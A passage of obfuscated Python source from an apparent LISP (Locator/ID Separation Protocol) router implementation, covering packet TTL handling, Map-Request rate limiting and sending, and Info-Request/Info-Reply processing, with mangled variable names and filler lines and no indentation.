dprint ( "IPv4 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 58 - 58: iII111i
return ( [ False , None ] )
if 48 - 48: OoO0O00 * OOooOOo / iII111i
if 90 - 90: I1IiiI * i11iIiiIii . OOooOOo / o0oOOo0O0Ooo
Oo0o0 -= 1
packet = packet [ 0 : 8 ] + struct . pack ( "B" , Oo0o0 ) + packet [ 9 : : ]
packet = packet [ 0 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : : ]
packet = lisp_ip_checksum ( packet )
return ( [ False , packet ] )
if 82 - 82: Oo0Ooo
if 50 - 50: I1Ii111 * OOooOOo * OoOoOO00 / OoooooooOO % iII111i
if 80 - 80: I1Ii111
if 35 - 35: Ii1I . O0 % i11iIiiIii * oO0o - OoooooooOO
if 87 - 87: iII111i * ooOoO0o - OOooOOo . O0
if 20 - 20: OoOoOO00 - IiII
if 9 - 9: O0 . I11i % I1ii11iIi11i * oO0o - I1Ii111 - i1IIi
def lisp_ipv6_input ( packet ) :
Ii1II1I11i1I = packet . inner_dest
packet = packet . packet
if 66 - 66: II111iiii / Oo0Ooo
if 93 - 93: iII111i + I11i * OoooooooOO . OoO0O00
if 40 - 40: ooOoO0o * I1Ii111 + iII111i
if 52 - 52: iII111i % I11i
if 95 - 95: IiII + Ii1I / OoO0O00 - iII111i / I1IiiI
Oo0o0 = struct . unpack ( "B" , packet [ 7 : 8 ] ) [ 0 ]
if ( Oo0o0 == 0 ) :
dprint ( "IPv6 packet arrived with hop-limit 0, packet discarded" )
return ( None )
elif ( Oo0o0 == 1 ) :
dprint ( "IPv6 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 27 - 27: Oo0Ooo + i1IIi + i11iIiiIii . OoO0O00 . OoO0O00
return ( None )
if 56 - 56: I1Ii111 / OoO0O00 + o0oOOo0O0Ooo . OoooooooOO * Oo0Ooo
if 14 - 14: OoO0O00
if 21 - 21: II111iiii + i11iIiiIii + I11i % I1IiiI
if 65 - 65: IiII + I1ii11iIi11i / iII111i / I1IiiI + Ii1I
if 88 - 88: IiII % iIii1I11I1II1
if ( Ii1II1I11i1I . is_ipv6_link_local ( ) ) :
dprint ( "Do not encapsulate IPv6 link-local packets" )
return ( None )
if 3 - 3: ooOoO0o / I1Ii111 % iIii1I11I1II1 % I11i * oO0o / iIii1I11I1II1
if 75 - 75: i11iIiiIii . iII111i
Oo0o0 -= 1
packet = packet [ 0 : 7 ] + struct . pack ( "B" , Oo0o0 ) + packet [ 8 : : ]
return ( packet )
if 68 - 68: OOooOOo . I1ii11iIi11i % I1ii11iIi11i . i11iIiiIii
if 45 - 45: oO0o % I1ii11iIi11i * I1Ii111
if 21 - 21: O0 + i11iIiiIii
if 72 - 72: OoOoOO00 * OoooooooOO % O0 / I1ii11iIi11i % Ii1I - I11i
if 65 - 65: iIii1I11I1II1 + II111iiii * OoO0O00 * i11iIiiIii / IiII
if 15 - 15: OoOoOO00 % O0 - OOooOOo - oO0o . iII111i . OoO0O00
if 52 - 52: II111iiii * o0oOOo0O0Ooo
if 95 - 95: I1Ii111 - OoooooooOO
def lisp_mac_input ( packet ) :
return ( packet )
if 99 - 99: OoooooooOO % IiII . I11i + OoooooooOO
if 57 - 57: Ii1I / I1IiiI * i1IIi
if 21 - 21: I11i . O0 * OoooooooOO + ooOoO0o * oO0o % i11iIiiIii
if 30 - 30: ooOoO0o * I1Ii111 + OoO0O00
if 30 - 30: Ii1I / iII111i * Ii1I
if 11 - 11: OoOoOO00 - OoOoOO00 % oO0o
if 3 - 3: I1IiiI - OoooooooOO % iIii1I11I1II1 + I1Ii111 + OoOoOO00
if 71 - 71: i1IIi % O0 % ooOoO0o
if 24 - 24: O0
def lisp_rate_limit_map_request ( dest ) :
ooO0 = lisp_get_timestamp ( )
if 88 - 88: OoooooooOO / Oo0Ooo / oO0o
if 99 - 99: I1Ii111 % OoOoOO00 % IiII - Ii1I
if 79 - 79: ooOoO0o + Oo0Ooo
if 80 - 80: OoOoOO00 % OoO0O00 . OoO0O00 * OoO0O00 * O0
Ooo0o0oo0 = ooO0 - lisp_no_map_request_rate_limit
if ( Ooo0o0oo0 < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME ) :
O0OO0 = int ( LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - Ooo0o0oo0 )
dprint ( "No Rate-Limit Mode for another {} secs" . format ( O0OO0 ) )
return ( False )
if 18 - 18: II111iiii . o0oOOo0O0Ooo + OoO0O00
if 69 - 69: OoO0O00 . ooOoO0o * ooOoO0o * iIii1I11I1II1
if 8 - 8: iII111i . oO0o . OOooOOo + iII111i . Ii1I
if 46 - 46: OoO0O00
if 21 - 21: iIii1I11I1II1 - iII111i
if ( lisp_last_map_request_sent == None ) : return ( False )
Ooo0o0oo0 = ooO0 - lisp_last_map_request_sent
IiI1i = ( Ooo0o0oo0 < LISP_MAP_REQUEST_RATE_LIMIT )
if 15 - 15: O0 + iII111i + i11iIiiIii
if ( IiI1i ) :
dprint ( "Rate-limiting Map-Request for {}, sent {} secs ago" . format ( green ( dest . print_address ( ) , False ) , round ( Ooo0o0oo0 , 3 ) ) )
if 31 - 31: iIii1I11I1II1 * iIii1I11I1II1 . I11i
if 52 - 52: i11iIiiIii / oO0o / IiII
return ( IiI1i )
if 84 - 84: I11i . oO0o + ooOoO0o
if 75 - 75: I1Ii111
if 97 - 97: ooOoO0o % Oo0Ooo . o0oOOo0O0Ooo
if 22 - 22: O0 % I11i + OoO0O00 - iII111i + I1IiiI . O0
if 73 - 73: ooOoO0o + O0 - I11i . I1IiiI + OOooOOo
if 36 - 36: I11i % OoO0O00 * OoOoOO00 - I1Ii111
if 16 - 16: ooOoO0o % OOooOOo . OoO0O00 % II111iiii . iIii1I11I1II1
def lisp_send_map_request ( lisp_sockets , lisp_ephem_port , seid , deid , rloc ) :
global lisp_last_map_request_sent
if 21 - 21: oO0o + II111iiii / OoOoOO00 * I11i
if 90 - 90: OoOoOO00 % OoOoOO00 + I11i
if 70 - 70: I1IiiI . ooOoO0o / I11i / OoO0O00
if 40 - 40: oO0o % iIii1I11I1II1 * iIii1I11I1II1 / Oo0Ooo * OoO0O00
if 61 - 61: OOooOOo
if 80 - 80: I1ii11iIi11i
iI111I = OooiIi11iiI11 = None
if ( rloc ) :
iI111I = rloc . rloc
OooiIi11iiI11 = rloc . translated_port if lisp_i_am_rtr else LISP_DATA_PORT
if 93 - 93: I1Ii111 . o0oOOo0O0Ooo
if 96 - 96: ooOoO0o - o0oOOo0O0Ooo % O0 * Ii1I . OoOoOO00
if 80 - 80: I1IiiI
if 31 - 31: I1Ii111 + o0oOOo0O0Ooo . I1IiiI + I11i . oO0o
if 50 - 50: Ii1I . OOooOOo
oOOOoOo0oo0O , IiiiI1i111 , OoO0o0OOOO = lisp_myrlocs
if ( oOOOoOo0oo0O == None ) :
lprint ( "Suppress sending Map-Request, IPv4 RLOC not found" )
return
if 6 - 6: OoooooooOO % ooOoO0o % OoO0O00 * IiII
if ( IiiiI1i111 == None and iI111I != None and iI111I . is_ipv6 ( ) ) :
lprint ( "Suppress sending Map-Request, IPv6 RLOC not found" )
return
if 62 - 62: i1IIi . I11i / I11i
if 90 - 90: O0 * OOooOOo / oO0o . Oo0Ooo * I11i
Ooo00 = lisp_map_request ( )
Ooo00 . record_count = 1
Ooo00 . nonce = lisp_get_control_nonce ( )
Ooo00 . rloc_probe = ( iI111I != None )
if 93 - 93: oO0o / ooOoO0o - I1Ii111
if 70 - 70: OOooOOo / Ii1I - ooOoO0o + OoooooooOO / OoO0O00 - i11iIiiIii
if 26 - 26: O0 + Oo0Ooo
if 30 - 30: IiII
if 6 - 6: O0
if 92 - 92: I11i
if 76 - 76: I11i / iIii1I11I1II1 - i11iIiiIii / O0 / O0
if ( rloc ) : rloc . last_rloc_probe_nonce = Ooo00 . nonce
if 19 - 19: Ii1I . I1IiiI - i1IIi * ooOoO0o . iIii1I11I1II1
Oo0ooO = deid . is_multicast_address ( )
if ( Oo0ooO ) :
Ooo00 . target_eid = seid
Ooo00 . target_group = deid
else :
Ooo00 . target_eid = deid
if 87 - 87: ooOoO0o % I1ii11iIi11i . I1IiiI
if 42 - 42: iII111i % i11iIiiIii % o0oOOo0O0Ooo . O0 % iII111i
if 72 - 72: Oo0Ooo . Oo0Ooo . IiII . Oo0Ooo
if 80 - 80: I1Ii111 + IiII + O0 - I1Ii111 . iIii1I11I1II1
if 53 - 53: OoO0O00 / i11iIiiIii * I1Ii111
if 62 - 62: oO0o / Oo0Ooo / IiII + I11i * ooOoO0o
if 84 - 84: ooOoO0o + OoOoOO00 * I1ii11iIi11i % OoooooooOO . O0
if 27 - 27: OoO0O00 * OoooooooOO - II111iiii / o0oOOo0O0Ooo
if 76 - 76: I11i % I1Ii111 % iII111i + IiII * iII111i + OoOoOO00
if ( Ooo00 . rloc_probe == False ) :
Oooo00oo = lisp_get_signature_eid ( )
if ( Oooo00oo ) :
Ooo00 . signature_eid . copy_address ( Oooo00oo . eid )
Ooo00 . privkey_filename = "./lisp-sig.pem"
if 83 - 83: OOooOOo . ooOoO0o / IiII
if 80 - 80: I1Ii111 . I11i - I11i + I1ii11iIi11i
if 42 - 42: I11i / IiII % O0 - Oo0Ooo
if 33 - 33: I1Ii111
if 1 - 1: IiII - iIii1I11I1II1 % OoooooooOO
if 1 - 1: o0oOOo0O0Ooo - i11iIiiIii + I11i
if ( seid == None or Oo0ooO ) :
Ooo00 . source_eid . afi = LISP_AFI_NONE
else :
Ooo00 . source_eid = seid
if 47 - 47: O0 + IiII + ooOoO0o + OOooOOo / OoOoOO00
if 31 - 31: oO0o * iII111i % OoOoOO00
if 80 - 80: ooOoO0o % I1ii11iIi11i % I11i . I1Ii111
if 3 - 3: ooOoO0o - Oo0Ooo
if 2 - 2: iII111i . iII111i
if 77 - 77: OOooOOo
if 74 - 74: O0
if 86 - 86: OoOoOO00
if 4 - 4: OoooooooOO * OoO0O00
if 93 - 93: OoO0O00 - I1Ii111 - OoO0O00
if 1 - 1: o0oOOo0O0Ooo . oO0o * i11iIiiIii * IiII - OoO0O00 - OoooooooOO
if 29 - 29: iIii1I11I1II1 + OoO0O00 * II111iiii * Ii1I * iII111i . O0
if ( iI111I != None and lisp_nat_traversal and lisp_i_am_rtr == False ) :
if ( iI111I . is_private_address ( ) == False ) :
oOOOoOo0oo0O = lisp_get_any_translated_rloc ( )
if 6 - 6: I1IiiI - OoOoOO00
if ( oOOOoOo0oo0O == None ) :
lprint ( "Suppress sending Map-Request, translated RLOC not found" )
return
if 63 - 63: OOooOOo - oO0o * I1IiiI
if 60 - 60: II111iiii - Oo0Ooo
if 43 - 43: I1IiiI - IiII - OOooOOo
if 19 - 19: I1Ii111 / I1Ii111 - i1IIi
if 99 - 99: O0
if 37 - 37: iIii1I11I1II1 / I1Ii111 + OoO0O00
if 85 - 85: ooOoO0o / I1IiiI
if 7 - 7: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i * I1IiiI + Ii1I
if ( iI111I == None or iI111I . is_ipv4 ( ) ) :
if ( lisp_nat_traversal and iI111I == None ) :
ooOO0o0oO = lisp_get_any_translated_rloc ( )
if ( ooOO0o0oO != None ) : oOOOoOo0oo0O = ooOO0o0oO
if 12 - 12: I1Ii111 / I11i / Ii1I
Ooo00 . itr_rlocs . append ( oOOOoOo0oo0O )
if 95 - 95: iIii1I11I1II1 . Ii1I % oO0o - I11i % IiII
if ( iI111I == None or iI111I . is_ipv6 ( ) ) :
if ( IiiiI1i111 == None or IiiiI1i111 . is_ipv6_link_local ( ) ) :
IiiiI1i111 = None
else :
Ooo00 . itr_rloc_count = 1 if ( iI111I == None ) else 0
Ooo00 . itr_rlocs . append ( IiiiI1i111 )
if 42 - 42: OoOoOO00 + oO0o * i1IIi + i11iIiiIii
if 25 - 25: Ii1I - Ii1I - I1ii11iIi11i / i1IIi . OoOoOO00 % Oo0Ooo
if 76 - 76: I1Ii111 / OoOoOO00
if 61 - 61: Oo0Ooo . i1IIi
if 78 - 78: i11iIiiIii
if 20 - 20: Ii1I
if 100 - 100: OoooooooOO . I1Ii111
if 32 - 32: iIii1I11I1II1 . iIii1I11I1II1 % II111iiii / Oo0Ooo . iIii1I11I1II1 . O0
if 63 - 63: I1IiiI . iIii1I11I1II1 . Oo0Ooo % OOooOOo - iII111i + ooOoO0o
if ( iI111I != None and Ooo00 . itr_rlocs != [ ] ) :
o00O00oOO00 = Ooo00 . itr_rlocs [ 0 ]
else :
if ( deid . is_ipv4 ( ) ) :
o00O00oOO00 = oOOOoOo0oo0O
elif ( deid . is_ipv6 ( ) ) :
o00O00oOO00 = IiiiI1i111
else :
o00O00oOO00 = oOOOoOo0oo0O
if 64 - 64: o0oOOo0O0Ooo / Ii1I % I1Ii111 % iII111i + OOooOOo * IiII
if 87 - 87: I1ii11iIi11i . i1IIi - I11i + OoOoOO00 . O0
if 37 - 37: IiII
if 65 - 65: ooOoO0o * Ii1I / I1IiiI . i1IIi % ooOoO0o . OoooooooOO
if 17 - 17: ooOoO0o / OoO0O00 / I1IiiI / OOooOOo % IiII
if 88 - 88: i1IIi - OoOoOO00
IiiiIi1iiii11 = Ooo00 . encode ( iI111I , OooiIi11iiI11 )
Ooo00 . print_map_request ( )
if 66 - 66: OoooooooOO - OoooooooOO * I11i / II111iiii + oO0o / Ii1I
if 7 - 7: Ii1I / iIii1I11I1II1
if 36 - 36: iIii1I11I1II1 % i11iIiiIii
if 35 - 35: Oo0Ooo + I1IiiI - O0 - I1Ii111
if 64 - 64: i1IIi * OoOoOO00 / II111iiii * oO0o
if 35 - 35: i1IIi - Ii1I - Ii1I . O0 % iII111i * iII111i
if ( iI111I != None ) :
if ( rloc . is_rloc_translated ( ) ) :
IIIii = lisp_get_nat_info ( iI111I , rloc . rloc_name )
if 15 - 15: OoooooooOO . Ii1I * I1Ii111 . ooOoO0o % OoO0O00 * Oo0Ooo
if 10 - 10: iII111i + i11iIiiIii . OOooOOo % iII111i - i1IIi
if 10 - 10: iIii1I11I1II1 * i11iIiiIii - O0
if 45 - 45: oO0o % OOooOOo - IiII + o0oOOo0O0Ooo + i11iIiiIii
if ( IIIii == None ) :
I1I111iIiI = rloc . rloc . print_address_no_iid ( )
i11ii = "gleaned-{}" . format ( I1I111iIiI )
IiI1i1i1 = rloc . translated_port
IIIii = lisp_nat_info ( I1I111iIiI , i11ii , IiI1i1i1 )
if 79 - 79: IiII % I1Ii111 . I1IiiI + O0 * oO0o * ooOoO0o
lisp_encapsulate_rloc_probe ( lisp_sockets , iI111I , IIIii ,
IiiiIi1iiii11 )
return
if 38 - 38: IiII
if 78 - 78: Oo0Ooo * I1ii11iIi11i % OOooOOo / Oo0Ooo + I1ii11iIi11i * IiII
oo0o00OO = iI111I . print_address_no_iid ( )
Ii1II1I11i1I = lisp_convert_4to6 ( oo0o00OO )
lisp_send ( lisp_sockets , Ii1II1I11i1I , LISP_CTRL_PORT , IiiiIi1iiii11 )
return
if 2 - 2: Oo0Ooo - OoOoOO00
if 22 - 22: OoO0O00 - oO0o - O0
if 49 - 49: iIii1I11I1II1 + I1Ii111 / i11iIiiIii
if 62 - 62: ooOoO0o . I1IiiI * i11iIiiIii
if 2 - 2: i11iIiiIii
if 86 - 86: I1Ii111 + o0oOOo0O0Ooo
iiiO0OOOOo = None if lisp_i_am_rtr else seid
if ( lisp_decent_pull_xtr_configured ( ) ) :
oOO00O0oooo00 = lisp_get_decent_map_resolver ( deid )
else :
oOO00O0oooo00 = lisp_get_map_resolver ( None , iiiO0OOOOo )
if 100 - 100: OoOoOO00 + OOooOOo
if ( oOO00O0oooo00 == None ) :
lprint ( "Cannot find Map-Resolver for source-EID {}" . format ( green ( seid . print_address ( ) , False ) ) )
if 44 - 44: IiII % iII111i * iII111i + iII111i * i11iIiiIii - OoO0O00
return
if 89 - 89: I1ii11iIi11i - OoO0O00 / i11iIiiIii + ooOoO0o / OoOoOO00
oOO00O0oooo00 . last_used = lisp_get_timestamp ( )
oOO00O0oooo00 . map_requests_sent += 1
if ( oOO00O0oooo00 . last_nonce == 0 ) : oOO00O0oooo00 . last_nonce = Ooo00 . nonce
if 15 - 15: II111iiii - IiII
if 74 - 74: i1IIi * OoooooooOO . Oo0Ooo . I1IiiI / o0oOOo0O0Ooo . OoOoOO00
if 50 - 50: I1ii11iIi11i / iIii1I11I1II1 - Oo0Ooo - i11iIiiIii % o0oOOo0O0Ooo - ooOoO0o
if 92 - 92: OoooooooOO - I1ii11iIi11i . I11i / O0 % iII111i
if ( seid == None ) : seid = o00O00oOO00
lisp_send_ecm ( lisp_sockets , IiiiIi1iiii11 , seid , lisp_ephem_port , deid ,
oOO00O0oooo00 . map_resolver )
if 96 - 96: I1IiiI . oO0o % O0
if 19 - 19: iIii1I11I1II1 + I1Ii111 / OoooooooOO % OOooOOo - i1IIi + I11i
if 87 - 87: OoooooooOO
if 97 - 97: ooOoO0o * IiII / iIii1I11I1II1
lisp_last_map_request_sent = lisp_get_timestamp ( )
if 65 - 65: i1IIi - i11iIiiIii + oO0o % I1IiiI - OoO0O00 % ooOoO0o
if 23 - 23: o0oOOo0O0Ooo . o0oOOo0O0Ooo - iIii1I11I1II1 / o0oOOo0O0Ooo
if 65 - 65: I1Ii111 + I1Ii111 . I1ii11iIi11i . OoOoOO00 % o0oOOo0O0Ooo * o0oOOo0O0Ooo
if 2 - 2: oO0o % iII111i + I1ii11iIi11i / II111iiii * I1ii11iIi11i
oOO00O0oooo00 . resolve_dns_name ( )
return
if 45 - 45: II111iiii . iII111i
if 55 - 55: ooOoO0o / iII111i / O0
if 98 - 98: O0 % iII111i + II111iiii
if 13 - 13: I1IiiI * oO0o - o0oOOo0O0Ooo
if 23 - 23: iIii1I11I1II1 + oO0o . oO0o / o0oOOo0O0Ooo
if 77 - 77: i1IIi * o0oOOo0O0Ooo * IiII
if 24 - 24: i11iIiiIii / iIii1I11I1II1 / iII111i
if 31 - 31: OOooOOo . iIii1I11I1II1 - oO0o
def lisp_send_info_request ( lisp_sockets , dest , port , device_name ) :
if 36 - 36: O0
if 30 - 30: i11iIiiIii * Oo0Ooo . IiII
if 65 - 65: oO0o * IiII * OOooOOo / OoooooooOO % I11i / I1Ii111
if 21 - 21: i1IIi * iII111i + OoO0O00
I1iII = lisp_info ( )
I1iII . nonce = lisp_get_control_nonce ( )
if ( device_name ) : I1iII . hostname += "-" + device_name
if 81 - 81: OOooOOo - OoooooooOO * iII111i / OOooOOo
oo0o00OO = dest . print_address_no_iid ( )
if 98 - 98: I11i . OOooOOo - OoO0O00 % O0 * O0
if 91 - 91: I1IiiI % ooOoO0o * iII111i % OoOoOO00 . OoOoOO00 + OoOoOO00
if 95 - 95: o0oOOo0O0Ooo % i1IIi
if 14 - 14: iIii1I11I1II1 + iIii1I11I1II1
if 74 - 74: OoOoOO00 . iIii1I11I1II1 + Ii1I + ooOoO0o % OoOoOO00
if 37 - 37: i11iIiiIii + O0 + II111iiii
if 13 - 13: OOooOOo / O0
if 19 - 19: iIii1I11I1II1 + IiII * I11i * II111iiii + o0oOOo0O0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 . II111iiii
if 36 - 36: I1IiiI * i1IIi + OoOoOO00
if 63 - 63: OoOoOO00 - iII111i
if 83 - 83: i1IIi / iII111i % ooOoO0o % i11iIiiIii + I1ii11iIi11i
if 82 - 82: iIii1I11I1II1 / OOooOOo
if 7 - 7: OoooooooOO
if 71 - 71: OOooOOo * Oo0Ooo . Oo0Ooo % iIii1I11I1II1
if 56 - 56: IiII * iIii1I11I1II1 - iIii1I11I1II1 . O0
O00o0 = False
if ( device_name ) :
ooOoo000OoO0O = lisp_get_host_route_next_hop ( oo0o00OO )
if 52 - 52: OoooooooOO - OoO0O00
if 24 - 24: iII111i / Oo0Ooo - I1ii11iIi11i + o0oOOo0O0Ooo
if 44 - 44: OoOoOO00 + I1IiiI . I1ii11iIi11i / i1IIi + II111iiii . Oo0Ooo
if 39 - 39: o0oOOo0O0Ooo
if 64 - 64: oO0o - i11iIiiIii
if 62 - 62: OoooooooOO - OoooooooOO / OoO0O00 - II111iiii . iIii1I11I1II1
if 2 - 2: O0 + o0oOOo0O0Ooo % OOooOOo . ooOoO0o % i1IIi
if 21 - 21: OoOoOO00 / OoooooooOO + I1Ii111 - IiII
if 62 - 62: Oo0Ooo % iII111i + OoooooooOO - I1ii11iIi11i % iII111i % iIii1I11I1II1
if ( port == LISP_CTRL_PORT and ooOoo000OoO0O != None ) :
while ( True ) :
time . sleep ( .01 )
ooOoo000OoO0O = lisp_get_host_route_next_hop ( oo0o00OO )
if ( ooOoo000OoO0O == None ) : break
if 54 - 54: IiII + OoOoOO00 / II111iiii % i11iIiiIii . I1Ii111
if 69 - 69: i1IIi + ooOoO0o + Ii1I
if 88 - 88: OoOoOO00 + iII111i % O0 + OOooOOo / OoooooooOO / OOooOOo
O0o00o000 = lisp_get_default_route_next_hops ( )
for OoO0o0OOOO , Oo00 in O0o00o000 :
if ( OoO0o0OOOO != device_name ) : continue
if 70 - 70: o0oOOo0O0Ooo - O0 % I1ii11iIi11i
if 28 - 28: I1Ii111 % iII111i
if 18 - 18: OoOoOO00
if 42 - 42: Ii1I . OOooOOo / O0 / i1IIi . i11iIiiIii
if 62 - 62: OoOoOO00
if 6 - 6: OoO0O00 * ooOoO0o . oO0o
if ( ooOoo000OoO0O != Oo00 ) :
if ( ooOoo000OoO0O != None ) :
lisp_install_host_route ( oo0o00OO , ooOoo000OoO0O , False )
if 77 - 77: iIii1I11I1II1
lisp_install_host_route ( oo0o00OO , Oo00 , True )
O00o0 = True
if 96 - 96: iII111i * I1ii11iIi11i
break
if 77 - 77: i11iIiiIii / iIii1I11I1II1 . I1ii11iIi11i
if 90 - 90: I1IiiI + I1IiiI % oO0o
if 95 - 95: OOooOOo + OoooooooOO . i11iIiiIii * OoO0O00 * I1IiiI / I1Ii111
if 5 - 5: Ii1I . oO0o / o0oOOo0O0Ooo - OoooooooOO
if 67 - 67: I1Ii111 + i1IIi - OOooOOo + OoooooooOO / II111iiii - I1Ii111
if 13 - 13: i11iIiiIii - O0 % OoOoOO00 + OOooOOo * ooOoO0o
IiiiIi1iiii11 = I1iII . encode ( )
I1iII . print_info ( )
if 55 - 55: i1IIi - OOooOOo / I11i * Ii1I
if 20 - 20: OoOoOO00 * iIii1I11I1II1 % O0 - i1IIi
if 51 - 51: I1ii11iIi11i * Ii1I - oO0o / O0 * OoooooooOO
if 12 - 12: i1IIi / iIii1I11I1II1 / O0 * OoO0O00
IiI11 = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
IiI11 = bold ( IiI11 , False )
IiI1i1i1 = bold ( "{}" . format ( port ) , False )
oO0OO = red ( oo0o00OO , False )
iIi = "RTR " if port == LISP_DATA_PORT else "MS "
lprint ( "Send Info-Request to {}{}, port {} {}" . format ( iIi , oO0OO , IiI1i1i1 , IiI11 ) )
if 77 - 77: I1Ii111 % oO0o - ooOoO0o / OOooOOo / OoOoOO00
if 67 - 67: O0 % iII111i
if 55 - 55: I1ii11iIi11i % OOooOOo - o0oOOo0O0Ooo - II111iiii
if 52 - 52: I1Ii111
if 34 - 34: II111iiii + iII111i / IiII
if 47 - 47: OoO0O00
if ( port == LISP_CTRL_PORT ) :
lisp_send ( lisp_sockets , dest , LISP_CTRL_PORT , IiiiIi1iiii11 )
else :
O00O0OO = lisp_data_header ( )
O00O0OO . instance_id ( 0xffffff )
O00O0OO = O00O0OO . encode ( )
if ( O00O0OO ) :
IiiiIi1iiii11 = O00O0OO + IiiiIi1iiii11
if 40 - 40: o0oOOo0O0Ooo / iII111i . o0oOOo0O0Ooo
if 63 - 63: o0oOOo0O0Ooo * iIii1I11I1II1 * II111iiii . OoO0O00 - oO0o / OoOoOO00
if 78 - 78: i11iIiiIii / OoO0O00 / i1IIi . i11iIiiIii
if 100 - 100: II111iiii . IiII . I11i
if 60 - 60: OoOoOO00 % OOooOOo * i1IIi
if 3 - 3: OoooooooOO
if 75 - 75: OoooooooOO * I1Ii111 * o0oOOo0O0Ooo + I1ii11iIi11i . iIii1I11I1II1 / O0
if 23 - 23: oO0o - O0 * IiII + i11iIiiIii * Ii1I
if 8 - 8: ooOoO0o / II111iiii . I1ii11iIi11i * ooOoO0o % oO0o
lisp_send ( lisp_sockets , dest , LISP_DATA_PORT , IiiiIi1iiii11 )
if 36 - 36: I1ii11iIi11i % OOooOOo - ooOoO0o - I11i + I1IiiI
if 37 - 37: I1ii11iIi11i * IiII
if 65 - 65: OOooOOo / O0 . I1ii11iIi11i % i1IIi % Oo0Ooo
if 36 - 36: i11iIiiIii - OOooOOo + iII111i + iII111i * I11i * oO0o
if 14 - 14: O0 - iII111i * I1Ii111 - I1IiiI + IiII
if 46 - 46: OoooooooOO * OoO0O00 . I1Ii111
if 95 - 95: ooOoO0o . I1ii11iIi11i . ooOoO0o / I1IiiI * OoOoOO00 . O0
if ( O00o0 ) :
lisp_install_host_route ( oo0o00OO , None , False )
if ( ooOoo000OoO0O != None ) : lisp_install_host_route ( oo0o00OO , ooOoo000OoO0O , True )
if 78 - 78: oO0o
return
if 33 - 33: oO0o + i1IIi
if 32 - 32: iIii1I11I1II1
if 71 - 71: Ii1I * I1IiiI
if 62 - 62: II111iiii / I1IiiI . I1ii11iIi11i
if 49 - 49: IiII / OoOoOO00 / O0 * i11iIiiIii
if 47 - 47: i11iIiiIii + iII111i + i11iIiiIii
if 66 - 66: o0oOOo0O0Ooo . I1IiiI + OoooooooOO . iII111i / OoooooooOO - IiII
def lisp_process_info_request ( lisp_sockets , packet , addr_str , sport , rtr_list ) :
if 47 - 47: o0oOOo0O0Ooo / II111iiii * i11iIiiIii * OoO0O00 . iIii1I11I1II1
if 34 - 34: I11i / o0oOOo0O0Ooo * OOooOOo * OOooOOo
if 89 - 89: I1ii11iIi11i . OoooooooOO
if 61 - 61: i1IIi + i11iIiiIii
I1iII = lisp_info ( )
packet = I1iII . decode ( packet )
if ( packet == None ) : return
I1iII . print_info ( )
if 59 - 59: i11iIiiIii * OOooOOo + i1IIi * iIii1I11I1II1 + I11i
if 97 - 97: OoO0O00 - I11i . OoooooooOO
if 58 - 58: I1ii11iIi11i / II111iiii / i11iIiiIii
if 27 - 27: iIii1I11I1II1 - O0 + OoOoOO00
if 28 - 28: oO0o . IiII * iII111i % Oo0Ooo - OoO0O00 / I11i
I1iII . info_reply = True
I1iII . global_etr_rloc . store_address ( addr_str )
I1iII . etr_port = sport
if 67 - 67: i11iIiiIii + i11iIiiIii / ooOoO0o - o0oOOo0O0Ooo
if 94 - 94: O0 + OoO0O00 / I1IiiI * II111iiii * i11iIiiIii
if 55 - 55: OoooooooOO * O0 + i1IIi % I1IiiI
if 10 - 10: II111iiii - Ii1I . I11i . O0 + Ii1I
if 50 - 50: iIii1I11I1II1 / Ii1I . ooOoO0o / ooOoO0o * OoOoOO00 * iII111i
if ( I1iII . hostname != None ) :
I1iII . private_etr_rloc . afi = LISP_AFI_NAME
I1iII . private_etr_rloc . store_address ( I1iII . hostname )
if 15 - 15: o0oOOo0O0Ooo % II111iiii + I1IiiI
if 21 - 21: I1ii11iIi11i - ooOoO0o
if ( rtr_list != None ) : I1iII . rtr_list = rtr_list
packet = I1iII . encode ( )
I1iII . print_info ( )
if 81 - 81: iII111i / i11iIiiIii / I1Ii111
if 70 - 70: I1ii11iIi11i / i11iIiiIii
if 90 - 90: II111iiii / OoOoOO00 . Ii1I . OoooooooOO
if 76 - 76: OoooooooOO
if 78 - 78: IiII % i11iIiiIii
lprint ( "Send Info-Reply to {}" . format ( red ( addr_str , False ) ) )
Ii1II1I11i1I = lisp_convert_4to6 ( addr_str )
lisp_send ( lisp_sockets , Ii1II1I11i1I , sport , packet )
if 23 - 23: iIii1I11I1II1 - o0oOOo0O0Ooo - Ii1I % OOooOOo
if 100 - 100: oO0o . OoO0O00 . i11iIiiIii % II111iiii * IiII
if 81 - 81: OOooOOo - OOooOOo + OoOoOO00
if 19 - 19: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 + iIii1I11I1II1 % I1IiiI + ooOoO0o
oOOo00oOO00o = lisp_info_source ( I1iII . hostname , addr_str , sport )
oOOo00oOO00o . cache_address_for_info_source ( )
return
if 22 - 22: oO0o % IiII + O0 - IiII . OoOoOO00 . I1IiiI
if 71 - 71: oO0o % i11iIiiIii + I1Ii111 . OoooooooOO * i1IIi
if 85 - 85: II111iiii - Oo0Ooo . OoOoOO00 - i1IIi - I1ii11iIi11i
if 24 - 24: ooOoO0o % ooOoO0o - I1ii11iIi11i - OoO0O00 % I1IiiI
if 8 - 8: iIii1I11I1II1 - O0 - i11iIiiIii . O0
if 35 - 35: Ii1I . II111iiii % OoOoOO00
if 3 - 3: OOooOOo - OoOoOO00
if 49 - 49: IiII / i11iIiiIii
def lisp_get_signature_eid ( ) :
for Oooo00oo in lisp_db_list :
if ( Oooo00oo . signature_eid ) : return ( Oooo00oo )
if 84 - 84: iIii1I11I1II1 / i1IIi + OoOoOO00
return ( None )
if 40 - 40: Ii1I % OoO0O00
if 93 - 93: iII111i . I1Ii111 . oO0o % o0oOOo0O0Ooo . Oo0Ooo
if 51 - 51: OOooOOo * OoO0O00 * Oo0Ooo
if 61 - 61: II111iiii / OoOoOO00 % II111iiii / I1ii11iIi11i % I1Ii111 - i1IIi
if 26 - 26: Ii1I % IiII + I1IiiI
if 30 - 30: I1Ii111 / iII111i
if 100 - 100: I1Ii111 * i11iIiiIii - I1ii11iIi11i
if 64 - 64: I1ii11iIi11i * I1IiiI * Ii1I
def lisp_get_any_translated_port ( ) :
for Oooo00oo in lisp_db_list :
for o0oO0O00 in Oooo00oo . rloc_set :
